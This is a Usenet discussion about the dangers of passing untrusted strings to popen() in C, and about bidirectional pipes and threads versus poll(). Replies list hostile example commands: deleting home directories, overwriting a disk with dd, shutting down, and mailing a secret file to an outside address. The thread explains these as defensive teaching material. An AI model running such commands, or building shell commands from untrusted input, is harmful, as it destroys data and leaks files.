Discussion:
Is popen() unsafe (with untrusted string) ?
Kenny McCormack
2021-01-07 19:19:56 UTC
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).

Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).

(*) This would be like the |& functionality in gawk.

P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...
--
"They say if you play a Microsoft CD backwards, you hear satanic messages.
Thats nothing, cause if you play it forwards, it installs Windows."
Richard Kettlewell
2021-01-07 19:37:19 UTC
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
mail ***@example.com < /home/gazelle/some/secret/file
rm -rf /home/gazelle/*
echo set -e >> /home/gazelle/.profile
mail -s "I will kill you" ***@domain
--
https://www.greenend.org.uk/rjk/
Jorgen Grahn
2021-01-07 21:40:12 UTC
Post by Richard Kettlewell
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
rm -rf /home/gazelle/*
echo set -e >> /home/gazelle/.profile
I think questions about this /usually/ begin with an example like:

char buf[1000]; // never mind buffer overflows just now
sprintf(buf, "cat \"%s\"", str);
fd = popen(buf, "r");

Slightly more interesting that way.
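
A minimal sketch of why the quoted form is still unsafe, assuming the same cat "%s" format as in the snippet above. The helper name build_cat_command is hypothetical, and the function only builds the string; it never runs it. A double quote inside str closes the quoting early, so everything after it is parsed by the shell as further commands.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: builds the command exactly as in the snippet above,
 * i.e. cat "<str>". Returns 0 on success, -1 if it would not fit in buf. */
int build_cat_command(char *buf, size_t cap, const char *str)
{
    assert(buf && str);
    /* sizeof counts the six fixed characters of cat "" plus the NUL */
    if (strlen(str) + sizeof "cat \"\"" > cap)
        return -1;
    snprintf(buf, cap, "cat \"%s\"", str);
    return 0;
}
```

With str set to x"; echo injected; echo " the buffer ends up holding cat "x"; echo injected; echo "", which the shell would run as three separate commands.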

/Jorgen
--
// Jorgen Grahn <grahn@ Oo o. . .
\X/ snipabacken.se> O o .
Jim Jackson
2021-01-07 19:46:02 UTC
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
Sorry not much help here but ...
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
I vaguely remember reference to p2open, but it's not on my linux box.
Google gives some references to solaris, Sun's^H^H^H^H Oracle's "Unix".
As I did work on solaris boxes a long time ago, that's where I must have
remembered it from.

Stack overflow has some discussions e.g.

https://stackoverflow.com/questions/3884103/can-popen-make-bidirectional-pipes-like-pipe-fork
Post by Kenny McCormack
(*) This would be like the |& functionality in gawk.
P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...
j***@schily.net
2021-01-13 12:05:06 UTC
[Post not displayed in the archive.]
Barry Margolin
2021-01-07 20:20:08 UTC
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
It can be any command you could type at a terminal, and it's as
dangerous as you would be. So it can delete your files. If you're
permitted to run sudo, it could use that to execute commands as root (if
the perpetrator knows your password).
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
(*) This would be like the |& functionality in gawk.
P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...
Google "popen2". But beware, it's easy to get deadlocked with something
like this. Many programs use stdio, and output is fully buffered when
writing to a pipe. So you could send something to the program, it
processes it and sends the output, but you never get it because the
program hasn't flushed its output buffer.
--
Barry Margolin, ***@alum.mit.edu
Arlington, MA
*** PLEASE post questions in newsgroups, not directly to me ***
Kaz Kylheku
2021-01-07 20:28:18 UTC
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
For instance, let str = "rm -rf ~".

Popen runs arbitrary shell commands.

Executing a shell command from an untrusted source is exactly the same
thing as logging in remotely to the system via SSH using a public
terminal, and then walking away so that anyone else can use the session.
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
No. You have to "sandbox" the contents of "str" yourself before passing
it to popen.

For instance you could define your own scripting language (some safe
subset of the shell, probably). In this sandboxed language, unsafe things are
somehow impossible to write (in what ways, to be decided by your design).

You write a compiler for this language whose output is the regular shell
language, and that output is fed to popen(), system(), or to
execl("/bin/sh", "/bin/sh", "-c", str, ...) etc.

Even if that compiler outputs code that uses unsafe features of the
shell language, they are not used in unsafe ways, because the
translation preserves the safe semantics of the sandboxed language.

That's exactly how we can trust the machine language
output by a safe high level language, even though it uses the same
vocabulary of unsafe instructions as an assembly language program.
--
TXR Programming Language: http://nongnu.org/txr
Kaz Kylheku
2021-01-07 20:49:01 UTC
Post by Kaz Kylheku
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
For instance, let str = "rm -rf ~".
Popen runs arbitrary shell commands.
Executing a shell command from an untrusted source is exactly the same
thing as logging in remotely to the system via SSH using a public
terminal, and then walking away so that anyone else can use the session.
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
No. You have to "sandbox" the contents of "str" yourself before passing
it to popen.
For instance you could define your own scripting language (some safe
subset of the shell, probably). In this sandboxed language, unsafe things are
somehow impossible to write (in what ways, to be decided by your design).
You write a compiler for this language whose output is the regular shell
language, and that output is fed to popen(), system(), or to
execl("/bin/sh", "/bin/sh", "-c", str, ...) etc.
Even if that compiler outputs code that uses unsafe features of the
shell language, they are not used in unsafe ways, because the
translation preserves the safe semantics of the sandboxed language.
Here is a trivial example.

Suppose we write a validator for this language.

  expr -> expr '+' expr
        | expr '-' expr
        | expr '*' expr
        | expr '/' expr
        | number
        | ident
        | '(' expr ')'

  ident := [a-zA-Z][a-zA-Z0-9]*

  number := [-+]?[0-9]+

If we validate the string to conform to this language, then it looks
like "a + 3 / 4" and whatnot.

We reject strings that don't conform.

Then we can safely do this---almost!

snprintf(big_buffer, .... "echo $(( %s ))", str);

/* check for truncation */

FILE *pipe = popen(big_buffer, "r");

We have defined a safe arithmetic language that we can use the shell to
execute. It won't clobber anything in our host environment.

However, it provides unfettered access to environment variables.

Suppose that the environment has a sensitive, integer-valued environment
variable SECRET_ENV_VAR. The untrusted user can supply SECRET_ENV_VAR as
the expression and thereby learn the value of that variable.

Thus, suppose we take this idea further and define a more useful
language than just a calculator language. We have to guard against
leaking secrets from the environment.

One way would be namespacing. The variables in our language like ABC
or def would not translate into the same-named shell variables, but
into, say, sb_ABC and sb_def ("sb" == sandbox).

We could allow that language to have some environment manipulation.
For that we would provide some API. Only certain environment variables
would be loaded into sandboxed variables. For instance if we consider
TERM to be safe, we could pre-load sb_TERM with the value of TERM.
Likewise, we would have a carefully controlled "export" feature, which
only allows certain variables.

If ABC is an export-allowed variable, then the statement
"export ABC=42" in the sandboxed scripting language would
translate to "sb_ABC=42; export ABC=$sb_ABC". I.e. set the local
variable, and then also export the corresponding environment variable
which really has to be called ABC.

Our compiler would gather a list of all variables referenced by the
program, and then for that subset of those variables which are
"environment-allowed", it would emit an initial code block like:

sb_FOO=$FOO ; sb_BAR=$BAR ; ...

# BAZ is not on the whitelist so doesn't appear above

to fetch the values of all referenced whitelisted variables from the
environment. Thus the language could access the env vars $FOO and $BAR,
but $BAZ would appear uninitialized even if there is such an environment
variable.
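
As a sketch of that last step only, assuming the compiler has already collected the referenced names: the function emit_env_prologue and its signature are made up for illustration, and the names are assumed to have passed identifier validation already.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: for every referenced name that is also on the
 * allowed list, append "sb_NAME=$NAME ; " to out.
 * Returns 0 on success, -1 if out is too small. */
int emit_env_prologue(const char *const *referenced, size_t nref,
                      const char *const *allowed, size_t nallowed,
                      char *out, size_t cap)
{
    size_t used = 0;

    assert(out && cap > 0);
    out[0] = '\0';
    for (size_t i = 0; i < nref; i++) {
        for (size_t j = 0; j < nallowed; j++) {
            if (strcmp(referenced[i], allowed[j]) != 0)
                continue;
            int n = snprintf(out + used, cap - used, "sb_%s=$%s ; ",
                             referenced[i], referenced[i]);
            if (n < 0 || (size_t)n >= cap - used)
                return -1;               /* truncated */
            used += (size_t)n;
            break;
        }
    }
    return 0;
}
```

With FOO, BAR and BAZ referenced and only FOO, BAR and TERM allowed, this produces "sb_FOO=$FOO ; sb_BAR=$BAR ; " and BAZ is never read from the environment.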
--
TXR Programming Language: http://nongnu.org/txr
Kenny McCormack
2021-01-07 21:18:29 UTC
In article <***@kylheku.com>,
Kaz Kylheku <563-365-***@kylheku.com> wrote:
...
Post by Kaz Kylheku
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
No. You have to "sandbox" the contents of "str" yourself before passing
it to popen.
Just for clarity, these topics are related, but not in the way you think.

I.e., I wasn't implying that a bidirectional popen() would somehow make it
possible to pass arbitrary strings to popen() and have it magically become
safe.

Rather, my (unstated) point was that if I had a bidirectional popen(),
then I could pass data into the sub-process via stdin, rather than on the
command line. This would, in the context of my actual use case (still as
of yet unstated in this thread), solve the real life use case problem.
--
If the automobile had followed the same development cycle as the
computer, a Rolls-Royce today would cost $100, get a million miles to
the gallon, and explode once every few weeks, killing everyone inside.
Kaz Kylheku
2021-01-07 21:35:21 UTC
Post by Kenny McCormack
...
Post by Kaz Kylheku
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
No. You have to "sandbox" the contents of "str" yourself before passing
it to popen.
Just for clarity, these topics are related, but not in the way you think.
I.e., I wasn't implying that a bidirectional popen() would somehow make it
possible to pass arbitrary strings to popen() and have it magically become
safe.
Rather, my (unstated) point was that if I had a bidirectional popen(),
then I could pass data into the sub-process via stdin, rather than on the
command line. This would, in the context of my actual use case (still as
of yet unstated in this thread), solve the real life use case problem.
If the two approaches are viable alternatives, it means that you in fact
do not have a requirement to allow an untrusted user to execute
arbitrary program syntax that they specify.

Allowing a "canned" (therefore safely chosen by you) command to receive
input solves the problem of otherwise having to pass the input via
parameters (where they are treated as shell syntax).

If that is the situation, it's not too difficult to escape some data so
that it can be passed as arguments. Wrap it in single quotes, and replace
every embedded single quote with '\''.
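
A small sketch of that quoting rule; the function name shell_quote and its buffer-based interface are assumptions made for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: wrap s in single quotes for a POSIX shell, replacing
 * each embedded ' with '\'' (close quote, escaped quote, reopen quote).
 * Returns 0 on success, -1 if out is too small. */
int shell_quote(const char *s, char *out, size_t cap)
{
    size_t n = 0;

    assert(s && out);
    if (cap < 3)                         /* room for '' and the NUL */
        return -1;
    out[n++] = '\'';
    for (; *s; s++) {
        size_t len = (*s == '\'') ? 4 : 1;
        if (n + len + 2 > cap)           /* keep room for closing ' and NUL */
            return -1;
        if (*s == '\'')
            memcpy(out + n, "'\\''", 4);
        else
            out[n] = *s;
        n += len;
    }
    out[n++] = '\'';
    out[n] = '\0';
    return 0;
}
```

For example, it's becomes 'it'\''s', and a; rm -rf ~ becomes the single harmless word 'a; rm -rf ~'.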
--
TXR Programming Language: http://nongnu.org/txr
Lew Pitcher
2021-01-07 20:29:49 UTC
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what
can go wrong?
Pretty much anything from simple command failure to deletion of the
entire system. Consider the effects of
popen(str,"r")
when
str = "false";

Consider the effects when
str = "rm -rf .";
or
str = "shutdown -h now";
or
str = "dd if=/dev/zero of=/ bs=1M";
Post by Kenny McCormack
Note: I'm not debating whether or not it is safe (I'm
pretty sure of the answer),
So long as you are pretty sure that an unaudited input is completely
unsafe...
Post by Kenny McCormack
but rather, I'm looking for an example of an
unsafe string (I.e., something an attacker would do).
See above.
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some
library or something available) that is bidirectional
Not as a single function, no
Post by Kenny McCormack
- i.e., you can
both write and read from it - for example, you could run the Unix 'sort'
utility this way - send it some data, then read back the sorted result
(*).
popen() is a wrapper around fork() and exec(), and you can accomplish
bidirectionality by correctly invoking those primitives directly.
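
Using the primitives directly also lets you skip the shell altogether. The following is only a sketch (capture_argv is a hypothetical name, and error handling is kept minimal): it runs a program with an argument vector via execvp(), so shell metacharacters in an argument are passed through as plain data.

```c
#include <assert.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run argv[0] with the given arguments, no shell
 * involved, and capture its standard output in out (always NUL-terminated).
 * Returns the number of bytes captured, or -1 if the child could not be
 * started. */
ssize_t capture_argv(char *const argv[], char *out, size_t cap)
{
    int fds[2];
    size_t got = 0;
    ssize_t n;
    pid_t pid;

    assert(argv && argv[0] && out && cap > 0);
    memset(out, 0, cap);                 /* guarantees NUL termination */

    if (pipe(fds) == -1)
        return -1;
    pid = fork();
    if (pid == -1) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {
        /* Child: stdout goes to the pipe; arguments are never parsed by sh. */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]);
        close(fds[1]);
        execvp(argv[0], argv);
        _exit(127);                      /* exec failed */
    }
    close(fds[1]);                       /* parent only reads */
    while (got < cap - 1 && (n = read(fds[0], out + got, cap - 1 - got)) > 0)
        got += (size_t)n;
    close(fds[0]);
    waitpid(pid, NULL, 0);
    return (ssize_t)got;
}
```

Calling it with the argument vector { "echo", "x; echo injected", NULL } yields the literal text "x; echo injected" followed by a newline; the semicolon never reaches a shell.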
Post by Kenny McCormack
(*) This would be like the |& functionality in gawk.
P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...
HTH
--
Lew Pitcher
"In Skills, We Trust"
Janis Papanagnou
2021-01-08 01:33:18 UTC
On 07.01.2021 20:19, Kenny McCormack wrote:
[ snip already answered popen() question ]
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
(*) This would be like the |& functionality in gawk.
(or like '|&' in ksh)
Post by Kenny McCormack
P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...
(Not sure you intended this as a "pure C" question but since you
posted in CUS and we can do such things in [some] shells...)

The '<>' redirection in shells allows read/write. With respect to
your sort statement we have to differentiate whether the command is
fully buffered [externally] (but then you could as well serialize
the command) or whether random changes should be possible in the
R/W-opened file. Ksh allows positioning ('seek'ing) in the opened
file with the specific redirection operators <#((N)) and >#((N)) .

Janis
Casper H.S. Dik
2021-01-11 16:36:37 UTC
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
It depends on whether the application has additional privileges and/or the
user does not have access to a shell; e.g., the user is actually a web
application.

popen() can execute any command a user can through a shell.
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.


There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for you to read but you are blocked
trying to write more. Using threads would fix that.

Casper
s***@grumpysods.com
2021-01-11 17:00:07 UTC
On 11 Jan 2021 16:36:37 GMT
Post by Casper H.S. Dik
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for you to read but you are blocked
trying to write more. Using threads would fix that.
Or alternatively you could be sensible and use select/poll multiplexing on
the descriptor returned from fileno() instead of messing around with threading
and all the nonsense that goes with it.
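
For illustration, a sketch of the poll() approach for the sort example from the original question. The function name sort_through_pipes is made up, it works on raw descriptors rather than FILE pointers, and it ignores SIGPIPE for the whole process, which a real program may not want. The write end is made non-blocking so that a full pipe can never stall the parent while the child is waiting for its own output to be read.

```c
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <poll.h>
#include <signal.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: pipe the NUL-terminated text in through sort(1) and
 * store its output in out. Returns the number of bytes stored, or -1 on
 * error or if the output does not fit in cap bytes. */
ssize_t sort_through_pipes(const char *in, char *out, size_t cap)
{
    int to_child[2], from_child[2], failed = 0;
    size_t len, sent = 0, got = 0;
    pid_t pid;

    assert(in && out);
    len = strlen(in);
    if (pipe(to_child) == -1)
        return -1;
    if (pipe(from_child) == -1 || (pid = fork()) == -1) {
        close(to_child[0]); close(to_child[1]);
        return -1;                       /* sketch: from_child may leak here */
    }
    if (pid == 0) {
        /* Child: wire the pipes to stdin/stdout, then drop the originals. */
        dup2(to_child[0], STDIN_FILENO);
        dup2(from_child[1], STDOUT_FILENO);
        close(to_child[0]); close(to_child[1]);
        close(from_child[0]); close(from_child[1]);
        execlp("sort", "sort", (char *)NULL);
        _exit(127);
    }
    close(to_child[0]);                  /* parent keeps only its own ends */
    close(from_child[1]);
    int wfd = to_child[1], rfd = from_child[0];
    signal(SIGPIPE, SIG_IGN);            /* process-wide: EPIPE, not a signal */
    fcntl(wfd, F_SETFL, O_NONBLOCK);     /* a full pipe must not block us */

    while (rfd != -1 && !failed) {
        if (wfd != -1 && sent == len) {  /* all input sent: give child EOF */
            close(wfd);
            wfd = -1;
        }
        struct pollfd fds[2] = {
            { .fd = rfd, .events = POLLIN },
            { .fd = wfd, .events = POLLOUT },  /* negative fds are skipped */
        };
        if (poll(fds, 2, -1) == -1) {
            failed = (errno != EINTR);
            continue;
        }
        if (fds[1].revents) {
            ssize_t n = write(wfd, in + sent, len - sent);
            if (n > 0) {
                sent += (size_t)n;
            } else if (n == -1 && errno != EAGAIN && errno != EINTR) {
                close(wfd);              /* child stopped reading */
                wfd = -1;
            }
        }
        if (fds[0].revents) {
            char extra;                  /* probe for EOF when out is full */
            ssize_t n = (got < cap) ? read(rfd, out + got, cap - got)
                                    : read(rfd, &extra, 1);
            if (n > 0 && got == cap) {
                failed = 1;              /* output does not fit */
            } else if (n > 0) {
                got += (size_t)n;
            } else if (n == 0) {         /* EOF: child is done */
                close(rfd);
                rfd = -1;
            } else if (errno != EINTR) {
                failed = 1;
            }
        }
    }
    if (wfd != -1) close(wfd);
    if (rfd != -1) close(rfd);
    waitpid(pid, NULL, 0);
    return failed ? -1 : (ssize_t)got;
}
```

Feeding it "pear\napple\nfig\n" gives back the three lines in sorted order. sort happens to read all of its input before writing anything, but the same loop also copes with filters that interleave reads and writes.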
Rainer Weikusat
2021-01-12 17:53:09 UTC
Post by s***@grumpysods.com
On 11 Jan 2021 16:36:37 GMT
Post by Casper H.S. Dik
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for you to read but you are blocked
trying to write more. Using threads would fix that.
Or alternatively you could be sensible and use select/poll multiplexing on
the descriptor returned from fileno() instead of messing around with threading
and all the nonsense that goes with it.
Something like this is much simpler with threads which can block
individually.
Nicolas George
2021-01-12 19:03:04 UTC
Rainer Weikusat , dans le message
Post by Rainer Weikusat
Something like this is much simpler with threads which can block
individually.
Until you need some kind of timeout or external interrupt. POSIX threads and
file descriptor I/O do not work well together, it's a common mistake.
Scott Lurndal
2021-01-13 16:12:30 UTC
Post by Nicolas George
Rainer Weikusat , dans le message
Post by Rainer Weikusat
Something like this is much simpler with threads which can block
individually.
Until you need some kind of timeout or external interrupt. POSIX threads and
file descriptor I/O do not work well together, it's a common mistake.
Can you elaborate on this rather odd statement? POSIX threads and
file descriptor (or even stdio) I/O interfaces work just fine together.

There's always the poll and select family of system calls to provide
timeouts; I use poll extensively in threaded networking code.
Nicolas George
2021-01-13 18:23:10 UTC
Post by Scott Lurndal
Can you elaborate on this rather odd statement? POSIX threads and
file descriptor (or even stdio) I/O interfaces work just fine together.
Oh? Then please tell me: how do you multiplex a mutex or condition wait with
a socket accept?
Post by Scott Lurndal
There's always the poll and select family of system calls to provide
timeouts; I use poll extensively in threaded networking code.
That's exactly what I mean: you have threads, and you still need to use I/O
multiplexing.
Scott Lurndal
2021-01-13 19:24:10 UTC
Post by Nicolas George
Post by Scott Lurndal
Can you elaborate on this rather odd statement? POSIX threads and
file descriptor (or even stdio) I/O interfaces work just fine together.
Oh? Then please tell me: how do you multiplex a mutex or condition wait with
a socket accept?
Post by Scott Lurndal
There's always the poll and select family of system calls to provide
timeouts; I use poll extensively in threaded networking code.
That's exactly what I mean: you have threads, and you still need to use I/O
multiplexing.
No, you don't _need_ to use I/O multiplexing in most cases (e.g. disk files).

For socket endpoints, I'll create a pipe(2) to use to notify the thread to
exit, and the thread main loop will poll the pipe and the socket fd. The
main code will write a single byte to the pipe to terminate the poll, and
the thread will exit.

One can certainly set up one or more threads to just do synchronous I/O on
demand using a request and completion queue (similar to most modern host
controller hardware) without using poll or select.
Nicolas George
2021-01-13 20:18:37 UTC
Post by Scott Lurndal
No, you don't _need_ to use I/O multiplexing in most cases (e.g. disk files).
Wow, that was a waste of time.
Post by Scott Lurndal
For socket endpoints, I'll create a pipe(2) to use to notify the thread to
exit and the thread main loop will poll the pipe and the socket fd. The
main code will write a single byte to the pipe to terminate the poll, and
the thread will exit.
So you know how to force threads to work with file descriptors despite the
fact that they're not designed for it. Good for you.
Kaz Kylheku
2021-01-13 19:51:18 UTC
Post by Nicolas George
Post by Scott Lurndal
Can you elaborate on this rather odd statement? POSIX threads and
file descriptor (or even stdio) I/O interfaces work just fine together.
I understand this as meaning that "to use threads with I/O effectively, we need
to use multiplexing mechanisms that are also usable by single-threaded programs
that don't know anything about threads".

I.e. threads (or at least POSIX threads) do not succeed in replacing mechanisms
for multiplexing events onto one thread such as timeouts, select/poll, async
I/O and whatever.
Post by Nicolas George
Oh? Then please tell me: how do you multiplex a mutex or condition wait with
a socket accept?
Yes, that can be a problem. I needed to do this in the kernel once,
and wrote it!

In the lmc-2.0 archive given here

http://www.kylheku.com/~kaz/lmc.html

See this function (in mutex.c):

/**
 * Atomically give up the mutex and wait on the condition variable.
 * Wake up if the specified timeout elapses, or if a signal is delivered.
 * Additionally, also wait on the specified file descriptors to become
 * ready, combining condition waiting with poll().
 * KCOND_WAIT_SUCCESS means the condition was signaled, or one or more
 * file descriptors are ready.
 * Also, a negative value can be returned indicating an error!
 * (The poll needs to dynamically allocate some memory for the wait table).
 * The timeout is relative to the current time, specifying how long to sleep in
 * jiffies (CPU clock ticks).
 */
int kcond_timed_wait_rel_poll(kcond_t *, kmutex_t *, long,
                              kcond_poll_t *, unsigned int);
--
TXR Programming Language: http://nongnu.org/txr
s***@grumpysods.com
2021-01-13 09:15:12 UTC
On Tue, 12 Jan 2021 17:53:09 +0000
Post by s***@grumpysods.com
Post by s***@grumpysods.com
On 11 Jan 2021 16:36:37 GMT
Post by Casper H.S. Dik
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for you to read but you are blocked
trying to write more. Using threads would fix that.
Or alternatively you could be sensible and use select/poll multiplexing on
the descriptor returned from fileno() instead of messing around with threading
and all the nonsense that goes with it.
Something like this is much simpler with threads which can block
individually.
It really isn't. But if you only know how to use a hammer...

IMO threads should be avoided unless absolutely necessary, as the downsides
generally outweigh the upsides, but we have a generation of devs brought up
on Windows where threads are the go-to way to do in-program multitasking due
to the limitations of that OS and its API.
Nicolas George
2021-01-13 12:38:00 UTC
Post by s***@grumpysods.com
It really isn't. But if you only know how to use a hammer...
IMO threads should be avoided unless absolutely necessary as the downsides
generally outweigh the upsides but we have a generation of devs brought up
on Windows where threads are the go-to way to do in program multitasking due
to the limitations of that OS and its API.
Hear, hear.

POSIX threads are good for high performance. If you have a CPU-intensive
computation that can be parallelized, then use threads.

If you want to handle many network connections as fast as possible, then use
threads too. But not one thread per connection, one thread per processor,
and a poll()-like loop in each.
s***@grumpysods.com
2021-01-13 14:45:37 UTC
On 13 Jan 2021 12:38:00 GMT
Post by Nicolas George
Post by s***@grumpysods.com
It really isn't. But if you only know how to use a hammer...
IMO threads should be avoided unless absolutely necessary as the downsides
generally outweigh the upsides but we have a generation of devs brought up
on Windows where threads are the go-to way to do in program multitasking due
to the limitations of that OS and its API.
Hear, hear.
POSIX threads are good for high performance. If you have a CPU-intensive
computation that can be parallelized, then use threads.
If you want to handle many network connections as fast as possible, then use
threads too. But not one thread per connection, one thread per processor,
and a poll()-like loop in each.
For absolute speed, yes, threads are a solution. But I had an argument with
a project manager a few years ago about wanting to use multiprocess for a
mid-load network server - select() -> fork() -> accept() etc - because it was
a bet-the-company system and we simply could not afford to have a bug in one
network session bring down the entire system. I won in the end, after
explaining to him what fork() and copy-on-write did, since he'd never
developed on *nix in his life.
Rainer Weikusat
2021-01-13 16:35:35 UTC
Post by s***@grumpysods.com
On Tue, 12 Jan 2021 17:53:09 +0000
Post by s***@grumpysods.com
Post by s***@grumpysods.com
On 11 Jan 2021 16:36:37 GMT
Post by Casper H.S. Dik
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for you to read but you are blocked
trying to write more. Using threads would fix that.
Or alternatively you could be sensible and use select/poll multiplexing on
the descriptor returned from fileno() instead of messing around with threading
and all the nonsense that goes with it.
Something like this is much simpler with threads which can block
individually.
It really isn't. But if you only know how to use a hammer...
It is, and your assumption about me is wrong: I've implemented both in
the past and have written a lot more code structured around synchronous
I/O multiplexing loops than multithreaded code.

For the given case, "feeding input to the secondary program" can be
implemented with a thread (or a forked process, obviously) which doesn't
need to interact with anything else in the program. It just writes to
the file descriptor and will be blocked by the kernel as necessary.

Another thread just reads whatever data becomes available and processes
it.

For instance, there's absolutely no need for any kind of fancy buffer
management, especially for partial writes, in this case.
Rainer Weikusat
2021-01-18 17:53:12 UTC
Post by s***@grumpysods.com
On Tue, 12 Jan 2021 17:53:09 +0000
Post by s***@grumpysods.com
Post by s***@grumpysods.com
On 11 Jan 2021 16:36:37 GMT
Post by Casper H.S. Dik
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for you to read but you are blocked
trying to write more. Using threads would fix that.
Or alternatively you could be sensible and use select/poll multiplexing on
the descriptor returned from fileno() instead of messing around with threading
and all the nonsense that goes with it.
Something like this is much simpler with threads which can block
individually.
It really isn't. But if you only know how to use a hammer...
It is
For illustration: Main 'working function' for a program relaying data to
and from an AF_UNIX stream socket:

static void forward_data(int from, int to)
{
    char buf[1024];
    ssize_t rc_r, rc_w;

    while (rc_r = read(from, buf, sizeof(buf)), rc_r > 0) {
        rc_w = write(to, buf, rc_r);
        rc_w != -1 || sys_die("write");
    }

    rc_r != -1 || sys_die("read");
}

This runs twice, from a 2nd thread and from main, and that's all of the
program.

Kenny McCormack
2021-01-12 01:35:11 UTC
